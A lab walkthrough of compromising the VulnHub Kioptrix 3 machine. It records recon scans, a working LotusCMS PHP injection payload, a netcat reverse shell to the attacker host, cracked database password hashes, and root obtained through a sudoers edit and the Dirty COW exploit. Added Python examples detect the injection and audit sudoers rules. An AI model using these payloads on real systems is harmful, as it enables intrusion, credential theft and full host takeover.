Recon
NMAP Complete Scan
# Nmap 7.92 scan initiated Thu Jan 6 00:19:34 2022 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /root/vulnHub/kioptrix3/192.168.1.95/scans/_full_tcp_nmap.txt -oX /root/vulnHub/kioptrix3/192.168.1.95/scans/xml/_full_tcp_nmap.xml 192.168.1.95
Nmap scan report for 192.168.1.95
Host is up, received arp-response (0.0032s latency).
Scanned at 2022-01-06 00:19:35 +08 for 28s
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http syn-ack ttl 64 Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Ligoat Security - Got Goat? Security ...
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
MAC Address: 00:0C:29:03:05:C9 (VMware)
Device type: general purpose|WAP|switch|media device|VoIP phone|storage-misc
Running (JUST GUESSING): Linux 2.6.X|2.4.X (99%), Linksys embedded (96%), Extreme Networks ExtremeXOS 15.X|12.X (94%), LifeSize embedded (94%), ShoreTel embedded (94%), LaCie embedded (94%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/h:linksys:wrv54g cpe:/o:extremenetworks:extremexos:15.3 cpe:/o:extremenetworks:extremexos:12.5.1 cpe:/o:linux:linux_kernel:2.4 cpe:/h:shoretel:8800 cpe:/o:linux:linux_kernel:2.6.31 cpe:/h:lacie:5big_network_2
Aggressive OS guesses: Linux 2.6.9 - 2.6.33 (99%), Linux 2.6.22 (embedded, ARM) (98%), Linux 2.6.22 - 2.6.23 (98%), Linksys WRV54G WAP (96%), Linux 2.6.19 - 2.6.36 (95%), Linux 2.6.31 (95%), Linux 2.6.9 - 2.6.30 (95%), Linux 2.6.13 - 2.6.32 (95%), Extreme Networks ExtremeXOS 12.5.1 or 15.3 (94%), Linux 2.4.18 - 2.4.35 (likely embedded) (94%)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint: (raw OS fingerprint block omitted)
Uptime guess: 0.002 days (since Thu Jan 6 00:17:46 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=205 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 3.15 ms 192.168.1.95
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jan 6 00:20:03 2022 -- 1 IP address (1 host up) scanned in 29.80 seconds
TCP/80 (HTTP)
FFUF
┌──(root💀kali)-[~/vulnHub/kioptrix3]
└─# ffuf -u http://192.168.1.107/FUZZ -w /usr/share/wordlists/dirb/common.txt -e ".php,.html,.txt" -fw 24
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.1.107/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Extensions : .php .html .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response words: 24
________________________________________________
[Status: 200, Size: 1819, Words: 167, Lines: 39]
cache [Status: 301, Size: 353, Words: 23, Lines: 10]
core [Status: 301, Size: 352, Words: 23, Lines: 10]
favicon.ico [Status: 200, Size: 23126, Words: 13, Lines: 6]
gallery [Status: 301, Size: 355, Words: 23, Lines: 10]
index.php [Status: 200, Size: 1819, Words: 167, Lines: 39]
index.php [Status: 200, Size: 1819, Words: 167, Lines: 39]
modules [Status: 301, Size: 355, Words: 23, Lines: 10]
phpmyadmin [Status: 301, Size: 358, Words: 23, Lines: 10]
style [Status: 301, Size: 353, Words: 23, Lines: 10]
update.php [Status: 200, Size: 18, Words: 2, Lines: 1]
:: Progress: [18460/18460] :: Job [1/1] :: 15386 req/sec :: Duration: [0:00:01] :: Errors: 0 ::
- phpmyadmin
- update.php
Initial Foothold
TCP/80 (HTTP) - Lotus CMS Exploit
- View enumerated directories
  - update.php
    - Permission Denied
  - phpmyadmin
  - index.php
    - Proceed to login
    - LotusCMS
- Search for LotusCMS Exploits
- Manual Exploit
- Payload
curl http://192.168.1.107/index.php --data "page=index');${system('COMMAND TO EXECUTE')};#"
- URL Encoded Payload
curl http://192.168.1.107/index.php --data "page=index%27%29%3B%24%7Bsystem%28%27COMMAND TO EXECUTE%27%29%7D%3B%23%22"
- URL Encode “COMMAND TO EXECUTE”
┌──(root💀kali)-[~/vulnHub/kioptrix3/192.168.1.95]
└─# hURL --URL "echo -n Vulnerability Found"
Original    :: echo -n Vulnerability Found
URL ENcoded :: echo%20-n%20Vulnerability%20Found
- Check if target is susceptible
┌──(root💀kali)-[~/vulnHub/kioptrix3/192.168.1.95]
└─# curl http://192.168.1.107/index.php --data "page=index%27%29%3B%24%7Bsystem%28%27echo%20-n%20Vulnerability%20Found%27%29%7D%3B%23%22" | grep -ioP "vulnerability found"
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1926    0  1838  100    88   802k  39338 --:--:-- --:--:-- --:--:--  940k
Vulnerability Found
- Execute Reverse Shell
curl http://192.168.1.107/index.php --data "page=index%27%29%3B%24%7Bsystem%28%27nc+192.168.1.1+4444+-e+/bin/bash%27%29%7D%3B%23%22"
- Obtained www-data shell
┌──(root💀kali)-[~/vulnHub/kioptrix3/192.168.1.95/exploit2]
└─# nc -nvlp 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.1.107.
Ncat: Connection from 192.168.1.107:59717.
whoami
www-data
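Added defender-side example (not part of the original write-up): decode a captured form-encoded POST body of the kind used above and flag the PHP eval-injection markers in the `page` parameter before the request reaches the CMS. The page-name allowlist pattern and the marker list are assumptions for this example.

```python
import re
from urllib.parse import parse_qs

# Legitimate LotusCMS page names are plain identifiers (assumption for this example).
SAFE_PAGE = re.compile(r"^[A-Za-z0-9_-]+$")
# Tokens that only appear when the parameter breaks out of the string into PHP code.
INJECTION_MARKERS = ("')", "${", "system(", "exec(", "passthru(", "shell_exec(", ";#")


def decode_page_param(body):
    """Return the URL-decoded 'page' value from a form-encoded POST body ('' if absent)."""
    return parse_qs(body, keep_blank_values=True).get("page", [""])[0]


def classify_page_param(page):
    """Return ('ok', []) for a plain page name, else ('suspicious', markers found)."""
    if SAFE_PAGE.fullmatch(page):
        return "ok", []
    return "suspicious", [m for m in INJECTION_MARKERS if m in page]


def scan_bodies(bodies):
    """Classify each captured body; returns a list of (body, verdict, markers)."""
    return [(b, *classify_page_param(decode_page_param(b))) for b in bodies]


# Constructed samples: a benign request and the encoded probe from the write-up.
SAMPLE_BODIES = [
    "page=index",
    "page=index%27%29%3B%24%7Bsystem%28%27echo%20-n%20Vulnerability%20Found%27%29%7D%3B%23%22",
]

if __name__ == "__main__":
    for body, verdict, markers in scan_bodies(SAMPLE_BODIES):
        print(f"{verdict:10s} {markers} <- {decode_page_param(body)!r}")
```

The same check applied at a reverse proxy or WAF would have rejected both the probe and the reverse-shell request, since neither `page` value is a plain identifier.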
Privilege Escalation
Loneferret - Via Creds Found
- Look for SQL Credentials
www-data@Kioptrix3:/home/www/kioptrix3.com$ grep -Rnw $(pwd)/* -ie "connect" --color=always 2>/dev/null
/home/www/kioptrix3.com/core/lib/RemoteFiles.php:91: // connect to the remote server
/home/www/kioptrix3.com/gallery/gheader.php:25: // Connect to MySQL
/home/www/kioptrix3.com/gallery/install.BAK:96: // Try to connect to the database
/home/www/kioptrix3.com/gallery/themes/black/stats.php:49://Connect to local host to check URL data
/home/www/kioptrix3.com/gallery/themes/black/stats.php:75: $db = MYSQL_CONNECT($host,$user, $pass) OR DIE("Unable to connect to database");
/home/www/kioptrix3.com/gallery/themes/black/stats.php:132://Connect to remote host to get initial URL data if there is no local data
/home/www/kioptrix3.com/gallery/themes/black/stats.php:138: $db = MYSQL_CONNECT($host,$user, $pass) OR DIE("Unable to connect to database");
- View stats.php
www-data@Kioptrix3:/home/www/kioptrix3.com$ mysql -u lancore_gallarif -p
Enter password:
ERROR 1045 (28000): Access denied for user 'lancore_gallarif'@'localhost' (using password: YES)
- Not the database we are looking for
- View gheader.php, which references /gfunctions.php and /gconfig.php
- Find configuration files
www-data@Kioptrix3:/home/www/kioptrix3.com$ find $(pwd) 2> /dev/null | grep "gfunctions\|gconfig"
/home/www/kioptrix3.com/gallery/gfunctions.php
/home/www/kioptrix3.com/gallery/BACK/gfunctions.php.bak
/home/www/kioptrix3.com/gallery/gconfig.php
- View gconfig.php
  - root:fuckeyou
- Access mysql to obtain more creds
www-data@Kioptrix3:/home/www/kioptrix3.com$ mysql -u lancore_gallarif -p
Enter password:
ERROR 1045 (28000): Access denied for user 'lancore_gallarif'@'localhost' (using password: YES)
www-data@Kioptrix3:/home/www/kioptrix3.com$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 15
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| gallery            |
| mysql              |
+--------------------+
3 rows in set (0.00 sec)

mysql> use gallery
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+----------------------+
| Tables_in_gallery    |
+----------------------+
| dev_accounts         |
| gallarific_comments  |
| gallarific_galleries |
| gallarific_photos    |
| gallarific_settings  |
| gallarific_stats     |
| gallarific_users     |
+----------------------+
7 rows in set (0.00 sec)

mysql> select * from dev_accounts;
+----+------------+----------------------------------+
| id | username   | password                         |
+----+------------+----------------------------------+
|  1 | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 |   # MD5 Hash
|  2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e |
+----+------------+----------------------------------+
2 rows in set (0.00 sec)
- Crack hash
┌──(root💀kali)-[~/vulnHub/kioptrix3/192.168.1.95/exploit]
└─# hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt --show
0d3eccfb887aabd50f243b3f155c0f85:Mast3r
5badcaf789d3d1d09794d8f021f40f0e:starwars
- dreg:Mast3r
- loneferret:starwars
- Switch to loneferret
Root - Via Buffer Overflow
- Check sudo access
loneferret@Kioptrix3:~$ sudo -l
sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
loneferret@Kioptrix3:~$
- Run ht
loneferret@Kioptrix3:~$ sudo ht
sudo ht
Error opening terminal: unknown.
loneferret@Kioptrix3:~$ export TERM=xterm
ht 2.0.18
- Search for exploits
- https://www.exploit-database.net/?id=17836
- A buffer overflow exploit where EIP is overwritten to spawn a shell
- Transfer exploit
- Exploit
python exploit.py > output
sudo ht $(cat output)
Root - Via Sudo
- Edit /etc/sudoers w/ ht editor
export TERM=xterm
sudo ht
ALT + F > Open > /etc/sudoers
Replace !/usr/bin/su w/ /bin/su
ALT + F > Save > Quit
- Obtain root
loneferret@Kioptrix3:/home/www/kioptrix3.com$ sudo su
root@Kioptrix3:/home/www/kioptrix3.com# whoami
root
root@Kioptrix3:/home/www/kioptrix3.com#
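Added audit example (not from the original write-up): parse sudoers rules of the shape behind the `sudo -l` output above and flag the combination that made both root paths possible, a `!` exclusion on su sitting next to a NOPASSWD editor that can rewrite /etc/sudoers. The editor/shell list and the sample rule are constructed assumptions, since the real sudoers file is not shown.

```python
import re

# Binaries that, when run as root, can write any file or hand over a shell.
# Assumption: an illustrative list, not exhaustive; extend it from your own baseline.
ROOT_EDITORS_OR_SHELLS = {"/usr/local/bin/ht", "/usr/bin/vi", "/usr/bin/vim",
                          "/bin/nano", "/bin/sh", "/bin/bash", "/bin/su", "/usr/bin/su"}

# user host=(runas) [NOPASSWD:] cmd, [NOPASSWD:] cmd ...
RULE_RE = re.compile(r"^\s*(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
                     r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+?)\s*$")


def parse_rule(line):
    """Parse one sudoers rule into (user, runas, [(negated, tag, command), ...]) or None."""
    m = RULE_RE.match(line)
    if not m:
        return None
    cmds = []
    for spec in m.group("cmds").split(","):
        spec, tag = spec.strip(), ""
        if spec.upper().startswith("NOPASSWD:"):
            tag, spec = "NOPASSWD", spec[len("NOPASSWD:"):].strip()
        cmds.append((spec.startswith("!"), tag, spec.lstrip("!")))
    return m.group("user"), (m.group("runas") or "").strip(), cmds


def audit_rule(line):
    """Return findings for one rule (empty list if nothing is flagged)."""
    parsed = parse_rule(line)
    if parsed is None:
        return []
    user, runas, cmds = parsed
    if runas not in ("", "root", "ALL"):
        return []
    risky = [cmd for negated, _, cmd in cmds if not negated and cmd in ROOT_EDITORS_OR_SHELLS]
    findings = [f"{user}: {cmd} runs as root and can rewrite /etc/sudoers or spawn a shell"
                for cmd in risky]
    if risky and any(negated for negated, _, _ in cmds):
        findings.append(f"{user}: '!' exclusions are ineffective next to {', '.join(risky)}")
    return findings


# Constructed sample mirroring the 'sudo -l' output above (the real file was not shown).
SAMPLE_RULE = "loneferret ALL=(root) NOPASSWD: !/usr/bin/su, NOPASSWD: /usr/local/bin/ht"

if __name__ == "__main__":
    for finding in audit_rule(SAMPLE_RULE):
        print(finding)
```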
Root - Via Kernel Exploit
- Ran linpeas
- Search exploits for linux version 2.6.24
- https://www.exploit-db.com/exploits/40839
- Transfer exploit
- Compile & Exploit
loneferret@Kioptrix3:/tmp$ nc 192.168.1.1 4444 > dirty.c
loneferret@Kioptrix3:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
dirty.c:193:2: warning: no newline at end of file
loneferret@Kioptrix3:/tmp$ chmod +x dirty; ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password:
Complete line:
firefart:fi1IpG9ta02N.:0:0:pwned:/root:/bin/bash

mmap: b7fe0000
CTRL + C
loneferret@Kioptrix3:/tmp$ su firefart
Password:
firefart@Kioptrix3:/tmp# cd /root
firefart@Kioptrix3:~# whoami
firefart
firefart@Kioptrix3:~# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@Kioptrix3:~#
- Obtain Root Flag